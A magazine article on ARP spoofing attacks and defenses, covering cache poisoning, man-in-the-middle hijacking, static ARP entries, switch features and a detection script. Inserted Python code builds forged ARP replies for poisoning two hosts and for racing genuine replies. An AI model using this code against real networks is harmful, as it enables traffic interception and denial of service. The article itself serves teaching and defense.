ARP protocol attacks and defenses

Camouflage and Skullduggery

© Lead Image © Andre Zhak,

Article from Issue 181/2015

ARP spoofing can be used to initiate denial-of-service attacks, network hijacking, and man-in-the-middle attacks on the intranet. We look at how to prevent these incursions.

Companies spend huge amounts of money to protect themselves from attacks from the Internet, but intranet security is not very advanced in most small to medium-sized enterprises. The credo is often: internal users will not attack their own network. The reality is rather different, which is reason enough to take a look at one of the most common attacks on internal networks, ARP spoofing, and the options for defending against it.

On the intranet, unlike on the Internet, delivery within a network segment is not based on Layer 3 (IP) but on Layer 2 (Ethernet): a frame identifies its destination by MAC address. The Address Resolution Protocol (ARP) maps IPv4 addresses to MAC addresses so that this works smoothly. Its historical counterpart RARP (Reverse ARP) does the opposite, mapping a MAC address to an IP address, and plays no part in the attacks described here.

If computer A wants to communicate with computer B, A sends an ARP request to the broadcast address to discover the MAC address of B. Computer B responds with an ARP reply sent directly to A. In a tcpdump capture, this kind of conversation looks like Listing 1.

Listing 1

Intranet Communication


The result of the query is stored in the ARP cache and reused for subsequent packets, so the exchange is not repeated for every frame. Linux keeps a cache entry for a limited time before marking it stale and re-verifying it with a new ARP request; how often stale entries are checked and garbage-collected is defined by the value in /proc/sys/net/ipv4/neigh/default/gc_stale_time. You can also set the value for each interface, for example in /proc/sys/net/ipv4/neigh/eth0/gc_stale_time. Whatever the timers, nothing in ARP authenticates the reply that creates or refreshes an entry, and that is what the attacks below exploit.

Attacks on ARP

The simplest attack at the ARP level relies on the attacker continuously sending ARP reply packets to computer A that claim the attacker's own MAC address for the IP address of computer B (Figure 1). If the attacker also sends ARP replies to computer B that register the attacker's MAC address for the IP address of computer A, the attacker holds a bidirectional man-in-the-middle position. This attack is also referred to as network hijacking. Now the attacker can sniff and manipulate all the traffic between the two computers, provided the attacking host forwards the packets on to their real destination; if it silently drops them instead, the result is a denial of service between A and B.

Figure 1: The attacker in the middle spoofs the MAC addresses of computers A and B.

This is not rocket science; in fact, it can easily be achieved with a short Python script (Listing 2) that uses the Scapy packet crafting library. Scapy can be installed using the operating system's package manager or with the Python pip tool:

pip install scapy

Listing 2

ARP Attack with Scapy


As parameters, the script requires the two endpoints of the connection the attacker wants to compromise. Lines 15 and 16 generate one ARP reply packet for each endpoint, claiming the attacker's own MAC address for the IP address of the opposite end. Scapy automatically fills in the fields that are left out, such as the source MAC address of the sending interface. The following loop (lines 18-21) sends the two packets and then waits for interval seconds before sending them again, so that the poisoned entries never age out of the victims' caches.

This kind of ARP attack is not very elegant and is easy to detect; after all, the attacker is sending reply packets for requests that were never made. But sometimes it is the only way for an attacker to hijack the connection via ARP: for example, if the two hosts have a faster connection to one another than the attacker has to them, so that a forged reply racing the legitimate one would always lose.

A superior variant of this attack sniffs the network traffic and waits for an ARP request, then answers it with its own ARP reply in parallel with the host actually addressed. In this case, the attacker hopes that their packet reaches the requesting host faster than the genuine response; which of two competing replies ends up in the cache depends on the victim's ARP implementation and on timing, so the race is not guaranteed either way. To do this, you can extend the script as shown in Listing 3.

Listing 3

ARP Attack with Own Response Packet


Scapy can not only generate network packets but also read traffic with the sniff() function, which invokes a callback function for each captured packet. To avoid having to analyze every packet, the script sets the BPF filter arp, which guarantees that only ARP packets are passed to the callback. The callback checks whether the packet is an ARP request, creates a reply by swapping the source and target addresses and inserting the attacker's MAC address as the answer, and sends the result on Layer 2 using sendp().
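The three kinds of packet discussed so far (the request and reply of Listing 1, the unsolicited replies of Listing 2, and the request-triggered reply of Listing 3) can be built and inspected without Scapy. The following Python is an added example, not one of the article's listings: it encodes the raw Ethernet/ARP frames by hand with struct, so it runs anywhere and sends nothing. All MAC and IP addresses in it are constructed test values; in Scapy, build_arp() corresponds to Ether()/ARP() and the frames would be sent with sendp().

```python
"""Raw ARP-over-Ethernet frames: build, parse, and forge poisoning replies.

Added example, not one of the article's listings. Pure Python (struct only),
nothing is sent; all addresses below are constructed test values.
"""
import struct

ETH_P_ARP = 0x0806             # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2  # ARP opcodes (RFC 826)
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_to_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def bytes_to_ip(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=None):
    """Ethernet II header (14 bytes) + ARP payload for IPv4 over Ethernet (28 bytes).

    A request goes to the broadcast MAC; a reply goes to the target's MAC
    unless dst_mac overrides it.
    """
    if dst_mac is None:
        dst_mac = BROADCAST if op == ARP_REQUEST else target_mac
    eth = mac_to_bytes(dst_mac) + mac_to_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_to_bytes(sender_mac) + ip_to_bytes(sender_ip)
    arp += mac_to_bytes(target_mac) + ip_to_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode a frame into its fields; None if it is not ARP for IPv4 over Ethernet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "dst": bytes_to_mac(frame[0:6]),
        "src": bytes_to_mac(frame[6:12]),
        "op": op,
        "sender_mac": bytes_to_mac(frame[22:28]),
        "sender_ip": bytes_to_ip(frame[28:32]),
        "target_mac": bytes_to_mac(frame[32:38]),
        "target_ip": bytes_to_ip(frame[38:42]),
    }


def poison_pair(attacker_mac, ip_a, mac_a, ip_b, mac_b):
    """Unsolicited replies as in Listing 2: A is told that B's IP lives at the
    attacker's MAC, and B is told the same about A. Resend these periodically
    so the poisoned entries never age out."""
    to_a = build_arp(ARP_REPLY, attacker_mac, ip_b, mac_a, ip_a)
    to_b = build_arp(ARP_REPLY, attacker_mac, ip_a, mac_b, ip_b)
    return to_a, to_b


def forge_reply(frame, attacker_mac):
    """Request-triggered reply as in Listing 3: answer a sniffed request for
    some IP with the attacker's MAC, addressed back to whoever asked.
    Returns None for anything that is not an ARP request."""
    req = parse_arp(frame)
    if req is None or req["op"] != ARP_REQUEST:
        return None
    return build_arp(ARP_REPLY, attacker_mac, req["target_ip"],
                     req["sender_mac"], req["sender_ip"])


if __name__ == "__main__":
    # Constructed addresses: A asks for B, the attacker answers in B's place.
    request = build_arp(ARP_REQUEST, "00:0c:29:aa:aa:aa", "192.0.2.10",
                        "00:00:00:00:00:00", "192.0.2.20")
    print("request:     ", parse_arp(request))
    print("forged reply:", parse_arp(forge_reply(request, "00:0c:29:c0:94:bf")))
```

Note what forge_reply() does with the captured request: the requester's own sender MAC and IP become the reply's target fields and its destination MAC, while the requested IP is paired with the attacker's MAC in the sender fields. That is the whole trick; the frame is otherwise indistinguishable from the genuine reply, which is why the defenses below work on the mapping rather than on the packet.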

Defense Against ARP Attacks

Man-in-the-middle attacks via ARP are easiest to spot on the client, but network devices such as switches can also detect them if the attack traffic passes through them. As seen, an ARP request is sent within an internal network to discover the MAC address for an IPv4 address.

The attack relies on spoofing the reply to an ARP request so that the client enters the attacker's MAC address, instead of the correct one, for the target's IP address in its ARP cache. The easiest way to prevent this attack is not to rely on ARP replies at all: instead, the MAC addresses of all devices on the network are entered statically on each host. Note that a static entry only protects the host it is configured on; the other endpoint (typically the default gateway) needs a static entry for the client as well, or it can still be poisoned in the opposite direction.

On a Linux or Mac OS X system, you can create a static (permanent) ARP entry with the arp command; the first argument is the IP address (or hostname) to pin, the second the MAC address to bind to it:

arp -s <ip-address> 00:0c:29:c0:94:bf

On Windows, on the other hand, the command looks like this (Windows separates the octets with hyphens; on newer Windows versions, netsh interface ipv4 add neighbors can be used for the same purpose):

arp -s <ip-address> 00-0c-23-c0-94-bf

In OpenBSD, you need to add the permanent parameter because, otherwise, only an overridable static entry is created:

arp -s <ip-address> 00:0c:29:c0:94:bf permanent

To minimize the administrative overhead, and assuming that the network is too large and changes too often for static ARP entries to be maintained easily, there are still ways to at least detect this type of attack.

To begin, I'll take a closer look at the client. Normally, an attacker will not yet be on the network when the client joins it for the first time. The client thus learns, with a high degree of probability, the correct MAC address of the computer with which it wants to communicate. On most networks, the MAC/IP address mappings rarely change, so you can write a script that records the mappings once and checks whether they have changed since (Listing 4).

Listing 4

Checking the MAC/IP Address Mappings


The attack is not only detected but also prevented, since the recorded mappings are pinned as static entries. The price is the difficulty of assigning a new MAC address to an IP, because the old static mapping needs to be deleted on every client before the new one can take effect. One way to achieve more flexibility is to use a configuration management tool such as Puppet, which can add new static entries to, or delete old ones from, the /etc/ethers file on each host.
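As an added example that is not the article's Listing 4, the following Python compares a recorded baseline in /etc/ethers format with the live cache in the format of /proc/net/arp on Linux, and flags two things: an IP whose MAC has changed since the baseline, and a single MAC that now answers for several IPs, which is the footprint of the man-in-the-middle position in Figure 1. Both inputs are constructed samples embedded in the script and the addresses are test values, so it runs offline; the parsing is kept in functions so the same logic can be pointed at the real files.

```python
"""Check the live ARP cache against a recorded MAC/IP baseline.

Added example, not the article's Listing 4. Parses ethers-style baseline text
and /proc/net/arp-style cache text; both samples below are constructed and
the addresses are test values, so the script runs offline.
"""

# Constructed baseline in /etc/ethers format (MAC address, then IP or hostname),
# recorded when the network was known to be clean.
BASELINE_ETHERS = """\
# MAC address          IP address
00:0c:29:aa:aa:aa      192.0.2.1
00:0c:29:bb:bb:bb      192.0.2.20
"""

# Constructed cache in the format of /proc/net/arp on Linux. The gateway
# (192.0.2.1) and 192.0.2.20 now both resolve to the same unknown MAC, which is
# what Figure 1 looks like from the victim's point of view.
LIVE_PROC_NET_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.0.2.1        0x1         0x2         00:0c:29:c0:94:bf     *        eth0
192.0.2.20       0x1         0x2         00:0c:29:c0:94:bf     *        eth0
192.0.2.30       0x1         0x2         00:0c:29:cc:cc:cc     *        eth0
192.0.2.40       0x1         0x0         00:00:00:00:00:00     *        eth0
"""

ATF_COM = 0x02  # entry is complete, i.e. a MAC has actually been learned


def normalize_mac(mac):
    return mac.lower().replace("-", ":")


def parse_ethers(text):
    """Return {ip_or_host: mac}; comment and blank lines are ignored."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        mac, host = line.split()[:2]
        mapping[host] = normalize_mac(mac)
    return mapping


def parse_proc_net_arp(text):
    """Return {ip: mac} for complete entries; incomplete ones carry no MAC yet."""
    mapping = {}
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], int(fields[2], 16), normalize_mac(fields[3])
        if flags & ATF_COM:
            mapping[ip] = mac
    return mapping


def check_mappings(baseline, live):
    """Return findings as (kind, key, detail) tuples.

    'changed':   an IP from the baseline now resolves to a different MAC.
    'duplicate': one MAC answers for several IPs (man-in-the-middle footprint).
    """
    findings = []
    for ip, expected in baseline.items():
        seen = live.get(ip)
        if seen is not None and seen != expected:
            findings.append(("changed", ip, f"expected {expected}, cache has {seen}"))
    by_mac = {}
    for ip, mac in live.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate", mac, "claimed by " + ", ".join(sorted(ips))))
    return findings


def static_arp_commands(baseline):
    """The `arp -s` commands that would pin the baseline on Linux. A host whose
    MAC legitimately changes must first have its old entry removed (`arp -d`)."""
    return [f"arp -s {ip} {mac}" for ip, mac in sorted(baseline.items())]


if __name__ == "__main__":
    baseline = parse_ethers(BASELINE_ETHERS)
    live = parse_proc_net_arp(LIVE_PROC_NET_ARP)
    for kind, key, detail in check_mappings(baseline, live):
        print(f"{kind:9} {key:20} {detail}")
    # On a real host:  baseline = parse_ethers(open("/etc/ethers").read())
    #                  live = parse_proc_net_arp(open("/proc/net/arp").read())
```

The duplicate check is the more useful of the two on networks that change often: a legitimately replaced NIC produces one "changed" finding, whereas an attacker in the middle of the client and its gateway produces both "changed" findings and one MAC that answers for two IPs at once.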

Today, many network devices offer the option of learning and checking MAC addresses statically or dynamically. The relevant techniques here include port security, DHCP snooping, private VLANs, Dynamic ARP Inspection (DAI), and implementation of the 802.1X standard.


It is not very difficult to protect yourself against the attack described here. As an administrator, you can either rely on a combination of static ARP entries and a configuration management tool, or on the features of the switches you deploy. ARP was standardized in 1982 (RFC 826), when networks still seemed to consist only of friendly computers. Anyone who uses ARP should be aware that this is not a secure protocol and that appropriate precautions must be taken.
